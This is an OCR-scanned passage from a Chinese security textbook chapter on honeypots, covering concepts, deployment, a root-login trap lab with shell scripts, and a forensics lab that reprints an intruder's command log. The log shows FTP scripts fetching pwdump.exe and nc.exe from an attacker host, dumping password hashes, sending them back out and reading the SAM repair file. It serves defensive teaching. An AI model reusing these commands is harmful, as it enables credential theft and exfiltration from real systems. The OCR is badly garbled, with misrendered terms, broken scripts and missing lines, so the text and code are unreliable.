收集 与 攻击 和 攻击 者 有 关 的 信息 ,以 改进 防御 能 力 。 实 际 上 , 蜜 饶 就 是 诱捕 攻击 者 的 一 个 陷 
阱 。 例 如 ,提示 访问 者 输入 用 户 名 和 口令 ,从 而 吸引 黑客 进行 登录 尝试 。 

蜜 护 技术 一 改 被 动 的 防护 方式 ,主动 吸引 攻击 者 ,同时 对 攻击 者 的 各 种 攻击 行为 进行 分 
析 并 找到 有 效 的 对 付 方法 。 为 此 , 蜜 钠 系 统 上 被 故意 留 下 一 些 虚假 的 信息 ,例如 安全 后 门 、 
漏洞 ,或 者 放置 一 些 攻 击 者 希望 得 到 的 敏感 信息 以 吸引 攻击 者 上 钧 。 无 论 如 何 对 蜜 钠 进 行 
配置 ,其 目的 都 是 使 得 整个 系统 处 于 被 侦 听 、 被 攻击 的 状态 。 这 就 意味 着 蜜 缸 是 用 来 被 探 
测 \ 被 攻击 甚至 最 后 被 攻陷 的 。 蜜 钠 并 不 会 直接 提高 计算 机 网 络 安全 ,但 却 是 其 他 安全 策略 
所 不 可 代替 的 一 种 主动 防御 技术 。 


6.2.2 蜜 缸 类 型 


1. 实 系统 密 钠 

实 系统 蜜 饶 运 行 着 真实 的 系统 ,并 且 带 着 真实 可 和 人 侵 的 漏洞 ,属于 最 危险 的 漏洞 ,但 是 
它 记 录 下 的 人 侵 信息 往往 是 最 真实 的 。 这 种 蜜 缸 安装 的 系统 一 般 都 是 最 初 的 版 本 ,没有 任 
何 SP 补丁 ,或 者 打 了 低 版 本 SP 补丁 ,根据 需要 ,也 可 能 补 上 了 一 些 漏洞 ,只 要 值得 研究 的 
漏洞 还 存在 即 可 。 然 后 把 密 缸 连接 上 网 络 ,根据 目前 的 网 络 扫描 频繁 度 来 看 ,这 样 的 蜜 饶 很 
快 就 能 吸引 到 目标 并 接受 攻击 ,系统 运行 着 的 记录 程序 会 记 下 入 侵 者 的 一 举 一 动 ,但 同时 它 
也 是 最 危险 的 ,因为 人 侵 者 每 一 次 人 侵 都 会 引起 系统 真实 的 反应 ,例如 被 溢出 ,渗透 ,夺取 权 
限 等 。 

2. 伪 系 统 密 钠 

伪 系 统 蜜 负 利 用 一 些 工具 程序 强大 的 模仿 能 力 ,伪造 出 不 属于 自己 平台 的 “漏洞 "。 入 
侵 这 样 的 “漏洞 ”, 只 能 是 在 一 个 程序 框架 里 打转 ,即使 成 功 “ 渗 透 ”, 也 仍然 是 程序 制造 的 “ 梦 
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境 "。 实 现 一 个 “ 伪 系 统 ” 并 不 困难 ,Windows 平台 下 的 一 些 虚拟 机 程序 、Linux 自身 的 脚本 
功能 加 上 第 三 方 工具 就 能 实现 ,甚至 在 Linux 下 还 能 实时 产生 一 些 根 本 不 存在 的 “漏洞 ”, 让 
入 侵 者 自 以 为 得 从 地 在 里 面 睹 忙 。 实 现 跟踪 记录 也 很 容易 ,只 要 在 后 人 台 开 着 相应 的 记录 程 
序 即 可 。 


6.2.3 密 缸 技术 


蜜 饶 系 统 的 实施 主要 技术 包括 网 络 欺骗 信息 控制 .数据 捕获 报警 等 。 

(1) 网 络 欺骗 。 为 了 使 蜜 缸 对 入 侵 者 更 有 吸引 力 ,使 其 成 为 首选 的 攻击 目标 , 蜜 负 使 用 
了 各 种 欺骗 手段 ,其 中 包括 网 络 流量 模拟 、 漏 洞 模拟 、 虚 拟 端口 响应 等 。 

(2) 信息 控制 。 蜜 缸 作为 入 侵 者 的 攻击 目标 也 不 可 避免 地 可 能 被 人 侵 者 俘获 ,成 为 他 
们 攻击 第 三 方 的 跳板 。 信 息 控 制 使 用 一 些 规 则 ,是 对 行为 的 牵制 政策 , 即 必 须 能 确定 信息 包 
能 发 送 到 什么 地 方 。 

蜜 铅 系 统 既 要 对 系统 的 外 出 流量 进行 限制 ,又 要 给 攻击 者 一 定 的 活动 自由 与 密 钠 网 络 
进行 交互 。 对 于 所 有 进入 蜜 负 系 统 的 连接 记录 , 蜜 铅 系 统 都 允许 进入 ;而 对 外 出 的 连接 要 进 
行 适当 限制 ,或 修改 这 些 外 出 连接 数据 包 的 目的 地 址 , 重 定向 到 指定 的 主机 ,同时 给 攻击 者 
造成 网 络 数 据 包 已 正常 发 出 的 假象 。 这 样 既 可 以 给 予 人 侵 者 足够 的 自由 ,又 可 以 防止 被 攻 
占 的 蜜 把 系统 成 为 攻击 第 三 方 的 跳板 。 

(3) 数据 捕获 。 数 据 捕获 是 指 获 取 黑 客 的 所 有 活动 。 在 攻击 者 入 侵 的 同时 , 蜜 铅 系 统 
可 以 捕捉 防火 墙 日 志 、 记 录 网 络 流量 、 系 统 活动 等 重要 数据 ,为 不 让 黑客 发 觉 ,这 些 数据 应 异 
地 存储 (例如 传送 至 远 端 日 志 服 务 器 并 给 予 分 析 )。 通 过 分 析 所 捕获 的 数据 信息 ,可 以 明确 
入 侵 者 的 攻击 手段 、 使 用 的 工具 、 攻 击 目的 等 有 用 数据 ,这 些 数 据 为 对 付 入 侵 提供 了 有 力 
帮助 。 

(4) 报警 。 由 于 蜜 久 系 统 预 设 的 漏洞 .陷阱 等 对 于 入 侵 者 有 着 很 大 的 吸引 力 , 所 以 它 一 
般 会 成 为 首选 的 入 侵 对 象 。 而 蜜 钠 系 统一 旦 被 访问 或 是 扫描 , 则 可 以 根据 实际 情况 及 时 通 
知 网 络 管理 员 , 对 网 络 实施 监控 。 蜜 铅 系 统 的 预警 信息 理论 上 比 IDS 要 准确 。 


6.2.4 密 把 技术 的 特点 


蜜 负 有 如 下 特点 : 

(1) 蜜 钠 不 是 一 个 单一 的 系统 ,而 是 一 个 网 络 ,是 一 种 高 度 相 互 作用 的 蜜 铅 , 装 有 多 个 
系统 和 应 用 软件 。 

(2) 所 有 放置 在 蜜 怒 内 的 系统 都 是 标准 的 产品 系统 , 即 真实 的 系统 和 应 用 软件 ,而 不 是 
仿效 的 。 

(3) 数据 量 小 。 蜜 经 能 采集 的 信息 量 由 自身 能 提供 的 手段 以 及 攻击 行为 数量 决定 。 蜜 
缸 仅仅 收 集 那些 对 它 进 行 访问 的 数据 。 这 就 使 得 蜜 缸 收集 信息 更 容易 ,分 析 起 来 也 更 为 
方便 。 

(4) 减少 误 报 率 。 蜜 镀 能 显著 减少 误 报 率 。 任 何 对 蜜 缸 的 访问 都 是 未 授权 的 ,非法 的 ， 
这 样 密 镀 检测 攻击 就 非常 有 效 , 从 而 大 大 减少 了 错误 的 报警 信息 ,甚至 可 以 避免 误 报 。 这 样 
网 络 安全 人 员 就 可 以 集中 精力 采取 其 他 的 安全 措施 。 

(5) 捕获 漏 报 。 蜜 把 可 以 很 容易 地 鉴别 捕获 针对 它 的 新 的 攻击 行为 。 由 于 针对 蜜 色 的 
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任何 操作 都 不 是 正常 的 ,这 样 就 使 得 任何 新 的 以 前 没有 见 过 的 攻击 很 容易 暴露 。 

(6) 资源 最 小 化 。 蜜 钠 所 需要 的 资源 很 少 ,即使 工作 在 一 个 大 型 网 络 环 境 中 也 是 如 此 。 
一 个 简单 的 主机 就 可 以 模拟 具有 多 个 IP 地 址 的 C 类 网 络 。 

(7) 解密 。 无 论 攻 击 者 对 连接 是 否 加 密 都 没有 关系 , 蜜 把 都 可 以 捕获 他 们 的 行为 。 


6.2.5 部 署 蜜 缸 


蜜 饶 主 机 可 以 部 署 在 防火 墙 外 面 (Internet)\DMZ( 非 军事 区 ) 防火 墙 后 面 (Intranet) ， 
如 图 6-2 所 示 。 


图 6-2 蜜 铅 主 机 的 布置 


这 样 的 部 署 是 考虑 了 防火 墙 的 局 限 性 和 脆弱 性 ,因为 防火 墙 必须 建立 在 基于 已 知 危 险 
的 规则 体系 上 进行 防御 ,如 果 入 侵 者 发 动 新 形式 的 攻击 ,防火 墙 没 有 相应 的 规则 去 处 理 , 这 
个 防火 墙 就 形同虚设 了 ,防火 墙 保护 的 系统 也 会 遭 到 破坏 ,因此 需要 蜜 缸 来 记录 入 侵 者 的 行 
动 和 入 侵 数据 ,必要 时 给 防火 墙 添 加 新 规则 或 者 手工 防御 。 

实验 6-3 ”简单 密 镀 陷阱 的 配置 

【实验 内 容 】 

Linux 的 超级 管理 员 账 号 是 root, 黑 客人 侵 的 一 个 坦途 就 是 获得 root 的 口令 。 一旦 拥 
有 root 的 口令 ,黑客 就 可 以 以 root 身份 合法 登录 。 实 际 上 黑客 也 有 可 能 “ 暗 度 陈仓 ” 先 以 
普通 用 户 身 份 登录 ,然后 用 su 命令 转换 成 root 身份 。 因 此 做 好 这 方面 的 防范 尤为 重要 。 

根据 蜜 把 的 原理 ,可 以 设置 一 个 简单 的 蜜 把 陷阱 ,使 黑客 以 root 身份 登录 的 入 侵 化 为 
泡影 。 为 此 ,考虑 3 种 可 能 情况 : 当 黑 客 以 root 身份 登录 时 ; 当 黑 客 用 su 命令 转换 成 root 
身份 时 ; 当 黑 客 以 root 身份 成 功 登录 后 一 段 时 间 内 。 

对 这 3 种 情况 ,分 别 设置 相应 的 蜜 怒 ,让 黑客 误 入 其 中 ,这 样 就 可 以 大 大 提高 入 侵 的 
难度 。 

(1) 黑客 以 root 身份 登录 的 陷阱 设置 。 

通常 情况 下 ,登录 Linux 系统 时 只 须 输入 用 户 名 和 口令 ,由 系统 验证 正确 就 能 顺利 进入 
系统 。 因 此 可 以 在 进入 环节 设置 陷阱 。 例 如 , 当 黑 客 已 获取 正确 的 root 口令 ,并 以 root 身 
份 登录 时 ,在 此 设置 一 个 提示 :“ 输 入 的 口令 错误 ”, 并 让 黑客 重新 输 用 户 名 和 口令 。 当 然 ， 
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这 只 是 一 个 迷惑 ,而 真正 的 合法 用 户 只 要 在 某 处 输入 一 个 正确 密码 就 可 通过 。 不 明 就 里 的 
黑客 却 因 此 就 掉 人 这 个 陷阱 ,不 断 地 输入 root 用 户 名 和 口令 ,得 到 的 是 口令 错误 的 提示 ,从 
而 使 它 怀疑 所 获 口令 的 正确 性 ,放弃 入 侵 的 企图 。 

为 了 实现 这 样 的 陷阱 设置 ,只 须 在 root 用 户 的 环境 配置 文件 . profile( 位 于 /etc/profile) 
中 加 一 段 脚本 就 可 以 了 。 必 要 时 还 可 以 在 这 段 脚本 中 触发 其 他 入侵 检测 与 预警 控制 程序 。 
脚本 如 下 : 


#root .profile 

clear 

echo "You had input an error password , please input again !" 
echo 

echo -n "Login:" 

read PASSWORD 


clear 

else 
echo "ACCESS DENIED!" 
exit 

fi 

实际 上 ,在 “ 某 处 输入 一 个 正确 密码 ”的 处 理 .采用 在 按 下 TAB 键 后 输入 正确 口令 则 视 
为 合法 用 户 。 虽 人 侵 者 获得 root 的 口令 ,简单 输入 仍 不 能 成 功 登录 。 如 果 入 侵 者 并 没有 获 
得 root 的 口令 ,而 是 在 尝试 输入 口令 ,还 可 将 其 尝试 记录 下 来 进行 分 析 , 根 据 其 猜测 口令 的 
倾向 来 增强 自身 的 口令 安全 强度 。 

(2) 黑客 用 su 命令 转换 成 root 身份 的 陷阱 设置 。 

为 防止 黑客 通过 su 命令 转换 成 root 身份 ,必须 在 此 设置 陷阱 : 当 黑 客 使 用 su 命令 并 
输入 正确 的 root 口令 时 令 其 报错 .使 其 误 认为 口令 错误 而 放弃 入 侵 企图 。 为 此 ,可 以 在 系 
统 的 /etc/profile 文件 中 设置 一 个 alias, 把 su 命令 重新 定义 成 转 到 普通 用 户 的 情况 就 可 以 。 
例如 alias su 二 "su Unknownuser"。 这 样 , 当 使 用 su 时 ,系统 判断 的 是 Unknownuser 的 口 
令 ,而 不 是 root 的 口令 ,一 般 不 能 匹配 。 即 使 输入 su root 也 是 错误 的 ,从 而 屏蔽 了 转向 
root 用 户 的 可 能 性 。 

(3) 黑客 以 root 身份 成 功 登 录 后 一 段 时 间 的 陷阱 设置 。 

假设 前 两 种 设置 都 失效 了 ,黑客 已 经 成 功 登 录 , 就 必须 启用 登录 成 功 的 陷阱 : 一 旦 root 
用 户 登 录 ,就 可 以 启动 一 个 计时 器 ,正常 的 root 登录 就 能 停止 计时 ,而 非法 入 侵 者 因 不 知道 
何 处 有 计时 器 ,就 无 法 停止 计时 。 如 果 到 了 规定 的 时 间 仍 未 终止 计时 ,可 认为 是 黑客 人 侵 ， 
需要 触发 必要 的 控制 程序 ,如 关机 处 理 等 ,以 免 造 成 损害 ,等 待 系统 管理 员 进 行善 后 处 理 。 
脚本 如 下 : 


# .testfile 

times=0 

while [ $times -le 30 ] do 
sleep1 

times=$ [times+1] 


» 195. % 


done 


halt /< 30 秒 时 间 到 ,触发 人 侵 检测 与 预警 控制 x / 
将 该 程序 放 入 root . bashrc 中 后 台 执 行 : 


#root . bashrc 


Sh .testfileg 


该 程序 不 能 用 Ctrl-C 键 终 止 , 系 统管 理 员 可 用 jobs 命令 检查 到 ,然后 用 kill %n 将 它 停止。 

从 上 述 3 种 陷阱 的 设置 ,可 以 把 握 这 样 的 规律 : 改变 正常 的 运行 状态 ,设置 虚假 信息 ， 
使 人 侵 者 落 入 陷阱 ,从 而 触发 人 侵 检测 与 预警 控制 程序 。 

实验 6-4” 蜜 铅 取 证 分 析 实 验 

【实验 目的 】 

了 解 蜜 缸 的 基本 原理 ,学 会 分 析 蜜 饶 数 据 。 

【实验 原理 】 

蜜 饶 系 统 最 为 重要 的 功能 是 对 系统 中 所 有 操作 和 行为 进行 监视 和 记录 ,可 以 通过 精心 
的 伪装 ,使 得 攻击 者 在 进入 目标 系统 后 仍 不 知道 自己 所 有 的 行为 已 经 处 于 系统 的 监视 下 。 
为 了 吸引 攻击 者 ,通常 在 蜜 把 系统 上 留 下 一 些 安全 后 门 以 吸引 攻击 者 上 钧 ,或 者 放置 一 些 网 
络 攻 击 者 希望 得 到 的 敏感 信息 ,当然 这 些 信息 都 是 虚假 的 信息 。 蜜 把 被 入 侵 而 记录 下 入 侵 
者 的 一 举 一 动 ,管理 员 通 过 研究 和 分 析 这 些 记 录 , 可 以 得 到 攻击 者 采用 的 攻击 工具 、 攻 击 手 
段 \ 攻 击 目的 和 攻击 水 平等 信息 ,还 能 对 攻击 者 的 活动 范围 以 及 下 一 个 攻击 目标 进行 了 解 ， 
以 便 加 强 防御 。 

【实验 内 容 】 

本 实验 中 所 用 的 操作 系统 : Windows 7 旗舰 版 SP1。 来 自 200.1. x. y( 假 设 的 IP) 的 攻 
击 者 成 功 攻陷 了 一 台 部 署 有 蜜 钠 系 统 的 主机 222. 200. p. q( 假 设 的 IP), 蜜 负 主 机 记录 了 人 和 
侵 过 程 ,入 侵 数 据 经 提取 并 经 简化 处 理 后 的 脚本 代码 如 下 所 示 。 其 中 ,www. unknown. net 
是 假设 的 域名 。 


echo werd >>c:\fun 
echo user johna2k > ftpcom 
echo hacker 2000 >> ftpcom 
echo get samdump.dll > > ftpcom 
echo get pwdump .exe > > ftpcom 
echo get nc .exe> > ftpcom 
echo quit> > ftpcom 
ftp s:ftpcom -n www.unknown.net 
Pwdump .exe> >new.pass 
echo userjohna2k > ftpcom2 
echo hacker2000> > ftpcom2 
Put new.pass> > ftpcom2 
echo quit> > ftpcom2 
ftp -s:ftpcom?2 -mn www.unknown.net 
ftp 200.1.x.y 
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echo open 200.1.x.y > ftpcom 

echo johna2k > ftpcom 

echo hacker2000 > > ftpcom 

echo get samdump .dl1 >> ftpcom 

echo get Pwdump .exe > > ftpcom 

echo get nc .exe >> ftpcom 

echo quit >> ftpcom 

open 200.1.x.y 

echo johna2k >>sasfile 

echo haxedj00 >>sasfile 

echo get pwdump .exe >>sasfile 

echo get samdump .dl1 >> sasfile 

echo get nc.exe >> sasfile 

echo quit >> sasfile 

ftp -s:sasfile 

open 200.1.x.y 

echo johna2k >> sasfile 

echo haxedj00 >>sasfile 

echo get pwdump .exe >>sasfile 

echo get samdump .dl1 >> sasfile 

echo get nc.exe >> sasfile 

echo quit >> sasfile 

C:\Program Files\Common Files\system\msad c\pwdump.exe >>yay.txt 
C:\Program Files\Common Files\system\msad c\pwdump.exe >>c:\yay.txt 
pwdump .exe >>c:\yay.txt 

net session >>yay2.txt 

net session >>c:\yay2.txt 

net users >> heh .txt 

net users >> c:\heh .txt 

net localgroup Domain Rdmin IWAM KENNY /ADD 
mkdir -/s 

mkdir 

mkdir -s/ 

mkdir /s- 

type c:\winnt\repair\sa. >>c:\har.txt 
del c:\inetpub\wwwroot\har.txt 

del c:\inetpub\wwwroot\har.txt 


【实验 要 求 】 

请 根据 攻击 过 程 ,详细 分 析 回 答 下 列 问 题 (指出 结论 是 由 哪些 攻击 引起 的 ,要 有 相应 的 
验证 测试 截图 ) 。 

(1) 攻击 序列 中 生成 几 个 批 处 理 文件 ? 请 写 出 这 些 文件 ,并 说 明 实 现 什么 功能 。 

文件 的 书写 格式 如 下 : 
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文件 名 实现 功能 


文件 内 容 


(2) 攻击 者 使 用 了 什么 黑客 工具 进行 攻击 ? 简 述 这 些 工 具 对 网 络 安全 的 危害 性 。 

(3) 攻击 者 如 何 使 用 黑客 工具 进入 并 控制 系统 ?关键 技术 是 什么 ? 

(4) 当 攻 击 者 获得 系统 的 访问 权 后 做 了 什么 ?〈 需 具体 描述 ) 

(5) 如 何 防止 这 样 的 攻击 ?( 需 具体 写 出 措施 、 理 由 ) 

(6) 攻击 者 是 否 警 觉 其 攻击 的 目标 是 一 台 蜜 钠 主 机 ? 如 果 是 ,为 什么 ? 

(7) 攻击 者 在 最 后 多 次 使 用 mkdir 命令 ,这 是 Windows 的 合法 命令 吗 ? 其 企图 是 什 
么 ? 为 什么 会 连用 多 个 相同 命令 ? 

(8) 命令 行 命令 是 黑客 实施 攻击 的 首选 工具 吗 ? 为 什么 ? 有 没有 其 他 形式 的 ? 如 有 请 
写 出 来 ,并 举例 说 明 。 

【实验 分 析 】 

从 攻击 系列 看 ,都 是 一 些 命令 ,因而 必须 熟悉 这 些 命令 ,否则 分 析 将 无 从 谈 起 。 命 令 中 ， 
使 用 到 重 定向 符 二 和 二 二 ,表示 将 回 显 输出 到 文件 ,前 者 如 原文 件 存在 则 覆盖, 后 者 是 妃 加 。 
一 些 命令 是 ftp 命令 的 子 命令 ,例如 open .get 等 。 

此 外 ,攻击 中 使 用 了 黑客 工具 pwdown. exe 和 nc. exe, 前 者 提取 Windows 系统 的 密码 
数据 库 sam 的 散 列 值 ,后 者 (netcat) 是 网 络 工具 中 的 “瑞士 军刀 ”, 它 能 完成 网 络 连接 ,并 通 
过 TCP 和 UDP 在 网 络 中 读 写 数据 。 

攻击 生成 一 些 脚本 ,使 用 了 像 ftp、telnet .net 等 多 种 命令 ,读者 可 据 此 一 一 分 析 , 从 而 回 
答 问 题 。 

由 本 例 可 知 , 可 以 利用 蜜 缸 来 取得 入侵 者 所 使 用 的 工具 和 技术 信息 ,以 及 他 们 都 做 了 什 
么 ,以 便 采 取 相 应 对 策 。 

详细 分 析 过 程 由 读者 自行 完成 。 

【实验 讨论 】 

如 何 模拟 实施 本 实验 的 攻击 ,具体 该 如 何 进 行 ? 


6.3 蜜 缸 和 人 侵 检测 系统 比较 


防火 墙 是 传统 的 信息 安全 技术 ,如果 有 足够 的 时 间 和 信息 ,攻击 者 就 可 以 探测 出 防火 墙 
为 外 界 提供 的 服务 ,一 旦 防火 墙 被 攻击 者 穿 透 , 它 就 无 法 对 网 络 提供 进一步 的 防护 。IDS 只 
有 在 攻击 进行 时 才 会 提供 信息 ,因而 难以 争取 足够 的 时 间 以 保护 所 有 易 被 攻击 的 系统 , 男 一 
方面 IDS 无 法 判断 出 新 的 攻击 行为 ,无 法 判断 攻击 是 否 成 功 。 防火墙 和 IDS 在 防御 方面 有 
其 局 限 性 。 
蜜 色 灵 活 地 使 用 欺骗 技术 ,可 以 拖延 攻击 者 ,同时 能 给 防御 者 提供 足够 的 信息 以 了 解 敌 
人 ,将 攻击 造成 的 损失 降 至 最 低 。 防 御 者 通过 提供 错误 信息 .迫使 攻击 者 浪费 时 间作 无 益 的 
进攻 ,以 减弱 后 续 的 攻击 力量 。 此 外 ,良好 的 诱捕 机 制 使 系统 不 被 入 侵 即 可 获得 攻击 者 的 手 
法 和 动机 的 相关 信息 。 这 些 信息 日 后 可 用 来 强化 现 有 的 安全 措施 ,例如 防火 墙 规则 和 IDS 
配置 等 。 
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蜜 负 的 检测 价值 在 于 它 的 工作 方式 。 塞 缸 仅仅 收集 那些 对 它 进 行 访 问 的 数据 。 在 同样 
的 条 件 下 ,NIDS 可 能 会 记录 成 千 上 万 的 报警 信息 .而 蜜 钠 却 只 有 几 百 条 。 这 就 使 得 蜜 钠 收 
集 信息 更 容易 ,分 析 起 来 也 更 为 方便 。 

人 侵 检 测 系统 能 够 对 网 络 和 系统 的 活动 情况 进行 监视 ,及 时 发 现 并 报告 异常 现象 。 但 
是 入 侵 检 测 系 统 在 使 用 中 存在 着 难以 检测 新 类 型 黑客 攻击 方法 ,可 能 出 现 漏 报 和 误 报 的 
问题 。 

蜜 缸 的 工作 方式 同 NIDS( 网 络 人 侵 检测 系统 ) 等 其 他 的 传统 检测 技术 正好 相反 ,NIDS 
不 能 解决 的 问题 , 密 饶 却 能 轻易 解决 。 蜜 饶 通过 观察 和 记录 黑客 在 密 缸 上 的 活动 ,可 以 了 解 
黑客 的 动向 .黑客 使 用 的 攻击 方法 等 有 用 信息 。 如 果 将 蜜 缸 采集 的 信息 与 IDS 采集 的 信息 
联系 起 来 , 则 有 可 能 减少 IDS 的 漏 报 和 误 报 ,并 能 用 于 进一步 改进 IDS 的 设计 ,增强 IDS 的 
检测 能 力 。 

蜜 缸 技术 是 一 种 新 型 的 针对 网 络 安全 的 主动 防御 技术 ,是 对 现 有 的 安全 体系 的 重要 补 
充 。 它 可 以 作为 独立 的 安全 信息 工具 ,也 可 以 和 其 他 类 型 的 安全 机 制 协作 使 用 ,取长补短 地 
对 入侵 进行 检测 ,查找 并 发 现 新 型 的 攻击 工具 。 
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1. 判断 题 

(1) 人 侵 检测 技术 是 用 于 检测 任何 损害 或 企图 损害 系统 的 机 密 性 、 完 整 性 或 可 用 性 等 
行为 的 一 种 网 络 安全 技术 。 ( ) 

(2) 主动 响应 和 被 动 响应 是 相互 对 立 的 ,不 能 同时 采用 。 ( ) 

(3) 异常 和 人 侵 检测 的 前 提 条 件 是 入 侵 性 活动 集 作为 异常 活动 集 的 子 集 ,而 理想 状况 是 
异常 活动 集 与 人 侵 性 活动 集 相 等 。 

(4) 针对 人 侵 者 采取 措施 是 主动 响应 中 最 好 的 响应 措施 。 

(5) 在 早期 大 多 数 的 人 侵 检测 系统 中 ,入侵 响应 都 属于 被 动 响应 。 

(6) 性 能 “瓶颈 ”是 当前 入侵 防御 系统 面临 的 一 个 挑战 。 

(7) 漏 报 率 , 是 指 系统 把 正常 行为 作为 人 侵 攻 击 而 进行 报警 的 概率 。 

(8) 与 人 侵 检测 系统 不 同 , 入 侵 防御 系统 采用 在 线 (Online) 方式 运行 。 

(9) 蜜 饶 技 术 是 一 种 被 动 响应 措施 。 

(10) 企业 应 考虑 综合 使 用 基于 网 络 的 入侵 检测 系统 和 基于 主机 的 人 侵 检测 系统 来 保 
护 企业 网 络 。 在 进行 分 阶段 部 署 时 ,首先 部 署 基 于 网 络 的 入侵 检测 系统 ,因为 它 通常 最 容易 
安装 和 维护 , 接 下 来 部 署 基 于 主机 的 人 侵 检测 系统 来 保护 至 关 重 要 的 服务 器 。 ( 六 

(11) 入 侵 检测 系统 可 以 弥补 企业 安全 防御 系统 中 的 安全 缺陷 和 漏洞 。 ( 

(12) 使 用 误 用 检测 技术 的 人 侵 检 测 系统 很 难 检测 到 新 的 攻击 行为 和 原 有 攻击 行为 的 
变种 。 

2. 选择 题 
(1) 从 系统 结构 上 来 看 .入侵 检测 系统 可 以 不 包括 ( 入 

A. 数据 源 B. 分 析 引 擎 C. 审计 D， 响 应 

(2) 通用 人 侵 检 测 框架 (CIDF) 模型 中 ,( ) 的 目的 是 从 整个 计算 环境 中 获得 事件 ， 
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并 向 系统 的 其 他 部 分 提供 此 事件 。 
A. 事件 产生 器 B. 事件 分 析 器 C. 事件 数据 库 D， 响 应 单元 
(3) pe si ) 。 


A. 系统 的 审计 日 志 B. 系统 的 行为 数据 
C. 应 用 程序 的 事务 日 志文 件 D. 网 络 中 的 数据 包 
(4) 误 用 入 侵 检测 技术 的 核心 问题 是 ( ) 的 建立 以 及 后 期 的 维护 和 更 新 。 
A. 异常 模型 B. 规则 集 处 理 引擎 
C. 网 络 攻击 特征 库 D. 审计 日 志 


(5) ( ) 是 在 蜜 饶 技 术 上 逐步 发 展 起 来 的 一 个 新 的 概念 ,在 其 中 可 以 部 署 一 个 或 者 

多 个 蜜 缸 ,来 构成 一 个 黑客 诱捕 网 络 体系 架构 。 

A. 蜜 网 B. 鸟 饵 C. 鸟 梨 D. 玻璃 鱼缸 

(6) 下 面 关 于 响应 的 说 法 正确 的 是 ( Js 

A. 主动 响应 和 被 动 响应 是 相互 对 立 的 ,不 能 同时 采用 

B. 被 动 响应 是 入 侵 检测 系统 中 的 唯一 响应 方式 

C. 入 侵 检测 系统 提供 的 警报 方式 只 能 是 显示 在 屏幕 上 的 警告 信息 或 窗口 

D. 主动 响应 的 方式 可 以 是 自动 发 送 邮 件 给 入 侵 发 起 方 的 系统 管理 员 请 求 协助 以 
识别 问题 和 处 理 问 题 

下 面 说 法 错误 的 是 ( js 

A. 由 于 基于 主机 的 入 侵 检 测 系 统 可 以 监视 一 个 主机 上 发 生 的 全 部 事件 ,它们 能 够 
检测 基于 网 络 的 入 侵 检测 系统 不 能 检测 的 攻击 

B. 基于 主机 的 人 侵 检测 可 以 运行 在 交换 网 络 中 

C. 基于 主机 的 和 人 侵 检测 系统 可 以 检测 针对 网 络 中 所 有 主机 的 网 络 扫描 

D. 基于 应 用 的 人 侵 检测 系统 比 起 基于 主机 的 人 侵 检 测 系统 更 容易 受到 攻击 ,因为 
应 用 程序 日 志 并 不 像 操 作 系统 审计 追踪 日 志 那 样 被 很 好 地 保护 

蜜 钠 技 术 的 主要 优点 有 ( ys 

A. 蜜 饶 技 术 属 于 被 动 响应 ,使 用 者 没有 成 为 刑事 诉讼 或 民事 诉讼 对 象 的 危险 

B. 收集 数据 的 真实 性 , 蜜 饶 不 提供 任何 实际 的 业务 服务 ,所 以 搜集 到 的 信息 有 很 
大 的 可 能 性 是 由 于 黑客 攻击 造成 的 , 漏 报 率 和 误 报 率 都 比较 低 

C. 可 以 收集 新 的 攻击 工具 和 攻击 方法 ,不 像 目 前 的 大 部 分 防火 墙 和 入 侵 检 测 系统 
只 能 根据 特征 匹配 方法 来 检测 已 知 的 攻击 

D. 不 需要 强大 的 资金 投入 ,可 以 用 一 些 低 成 本 的 设备 

E. 可 以 及 时 地 阻 断 网 络 人 侵 行 为 

通用 入 侵 检 测 框架 (CIDF) 模型 的 组 件 包 括 ( Yes 
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A. 事件 产生 器 B. 活动 轮廓 
C. 事件 分 析 器 D. 事件 数据 库 
E. 响应 单元 


(10) 主动 响应 是 指 基于 一 个 检测 到 的 入 侵 所 采取 的 措施 。 对 于 主动 响应 来 说 ,其 选择 
的 措施 可 以 归 入 的 类 别 有 ( ys 
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A. 针对 入 侵 者 采取 措施 B. 修正 系统 
C. 收集 更 详细 的 信息 D. 入 侵 追 踪 
(11) 随 着 交换 机 的 大 量 使 用 ,基于 网 络 的 入侵 检测 系统 面临 着 无 法 接收 数据 的 问题 。 
由 于 交换 机 不 支持 共享 媒质 的 模式 ,传统 的 采用 一 个 嗅 探 器 (snibr) 来 监听 整个 子 网 的 办 
法 不 再 可 行 。 可 选择 解决 的 办 法 有 ( Js 
A. 不 需要 修改 ,交换 网 络 和 以 前 共享 媒质 模式 的 网 络 没有 任何 区 别 
B. 使 用 交换 机 的 核心 芯片 上 的 一 个 调试 的 端口 
C. 把 入侵 检测 系统 放 在 交换 机 内 部 或 防火 墙 等 数据 流 的 关键 入 口 .出 口 处 
D. 采用 分 接 器 (tap) 
E. 使 用 以 透明 网 桥 模式 接 人 的 和 人 侵 检测 系统 
(12) 入侵 防御 技术 面临 的 挑战 主要 包括 ( Ss 
A. 不 能 对 入 侵 活动 和 攻击 性 网 络 通信 进行 拦截 


B. 单 点 故障 
C. 性 能 瓶颈 
D. 误 报 和 漏 报 
(13) 入 侵 检测 技术 可 以 分 为 误 用 检测 和 ( ) 两 大 类 。 
A. 病毒 检测 B. 详细 检测 C. 异常 检测 D. 漏洞 检测 


(14) 关于 入 侵 检 测 技术 ,下 列 描述 错误 的 是 ( 0 
A. 入 侵 检 测 系统 不 对 系统 或 网 络 造成 任何 影响 
B. 审计 数据 或 系统 日 志 信息 是 人 侵 检测 系统 的 一 项 主要 信息 来 源 
C. 入 侵 检测 信息 的 统计 分 析 有 利于 检测 到 未 知 的 人 侵 和 更 为 复杂 的 人 侵 
D. 基于 网 络 的 入 侵 检测 系统 无 法 检查 加 密 的 数据 流 
(15) 在 如 图 6-3 所 示 的 基于 网 络 的 人 侵 检 测 系统 的 基本 结构 中 ,对 应 工 、 工 .由 模 块 的 


名 称 是 (  )。 


入 侵 事件 规则 解析 
检测 模块 也 ”模块 
个 
[一 | 存 取 模块 kk 让 1 ml 
告警 数据 库 个 
I 
个 以 太 网 
Ce 


图 6-3 基于 网 络 的 人 侵 检测 系统 的 基本 结构 


A. 数据 包 捕 获 模 块 、 网 络 协议 分 析 模 块 、 攻 击 特征 库 
B. 网 络 协议 分 析 模 块 、 数 据 包 捕 获 模 块 、 攻 击 特征 库 
C. 攻击 特征 库 、 网 络 协 议 分析 模 块 、 数 据 包 捕获 模块 
D. 攻击 特征 库 、 数 据 包 捕获 模块 ,网络 协 议 分 析 模 块 
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(16) 下 列 关于 入 侵 检 测 系统 探测 器 获取 网 络 流量 的 方法 中 错误 的 是 ( 
A. 利用 交换 设备 的 镜像 功能 B. 在 网 络 链 路 中 串 接 一 台 分 路 器 
